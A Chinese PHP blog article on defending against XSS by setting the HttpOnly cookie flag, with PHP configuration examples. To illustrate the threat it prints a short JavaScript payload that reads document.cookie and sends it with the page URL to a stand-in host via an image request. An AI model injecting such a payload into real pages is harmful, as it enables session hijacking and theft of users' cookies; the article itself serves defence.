编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

将博客园(cnblogs.com)数据导入到wordpress的代码

Jan 06 PHP

php字符串分割函数explode的实例代码

Feb 07 PHP

php实现单链表的实例代码

Mar 22 PHP

基于php缓存的详解

May 15 PHP

zend optimizer在wamp的基础上安装图文教程

Oct 26 PHP

PHP中的gzcompress、gzdeflate、gzencode函数详解

Jul 29 PHP

php中socket的用法详解

Oct 24 PHP

php短址转换实现方法

Feb 25 PHP

PHP也能干大事之PHP中的编码解码详解

Apr 20 PHP

php header函数的常用http头设置

Jun 25 PHP

Yii框架实现多数据库配置和操作的方法

May 25 PHP

解决laravel(5.5)访问public报错的问题

Oct 12 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

使用 MySQL 开始 PHP 会话

2006/12/21 PHP

PHP分页显示制作详细讲解

2008/11/19 PHP

PHP扩展编写点滴技巧收集

2010/03/09 PHP

一些PHP Coding Tips(php小技巧)[2011/04/02最后更新]

2011/05/02 PHP

调整优化您的LAMP应用程序的5种简单方法

2011/06/26 PHP

PHP连接MSSQL时nvarchar字段长度被截断为255的解决方法

2014/12/25 PHP

PHP正则表达式之捕获组与非捕获组

2015/11/06 PHP

thinkphp5 URL和路由的功能详解与实例

2017/12/26 PHP

PHP For循环字母A-Z当超过26个字母时输出AA,AB,AC

2020/02/16 PHP

JSQL 基于客户端的成绩统计实现方法

2010/05/05 Javascript

基于jquery 的一个progressbar widge

2010/10/29 Javascript

jquery插件制作自增长输入框实现代码

2012/08/17 jQuery

jquery动态添加删除一行数据示例

2014/06/12 Javascript

jQuery实现两个select控件的互移操作

2016/12/22 Javascript

利用nodeJs anywhere搭建本地服务器环境的方法

2018/05/12 NodeJs

JavaScript设计模式之模板方法模式原理与用法示例

2018/08/07 Javascript

玩转vue的slot内容分发

2018/09/22 Javascript

Vue 进阶之路（三）

2019/04/18 Javascript

详解小程序之简单登录注册表单验证

2019/05/13 Javascript

在Vue项目中使用Typescript的实现

2019/12/19 Javascript

[01:52]深扒TI7聊天轮盘语音出处7

2017/05/11 DOTA

Python爬取京东的商品分类与链接

2016/08/26 Python

Python爬虫使用脚本登录Github并查看信息

2018/07/16 Python

python 实现倒排索引的方法

2018/12/25 Python

python保存字典和读取字典的实例代码

2019/07/07 Python

详解使用CSS3的@media来编写响应式的页面

2017/11/01 HTML / CSS

HTML5头部标签的一些常用信息小结

2016/10/23 HTML / CSS

世界领先的在线地板和建筑材料批发商：BuildDirect

2017/02/26 全球购物

拉斯维加斯酒店、演出、旅游、俱乐部及更多：Vegas.com

2019/02/28 全球购物

幼师专业毕业生自荐信

2013/09/29 职场文书

老总助理工作岗位职责

2014/02/06 职场文书

大专学生求职自荐信

2014/07/06 职场文书

机关副主任个人四风问题整改措施

2014/09/26 职场文书

村党支部书记四风问题个人对照检查材料思想汇报

2014/10/06 职场文书

家庭经济困难证明

2015/06/23 职场文书

社区志愿者服务心得体会

2016/01/22 职场文书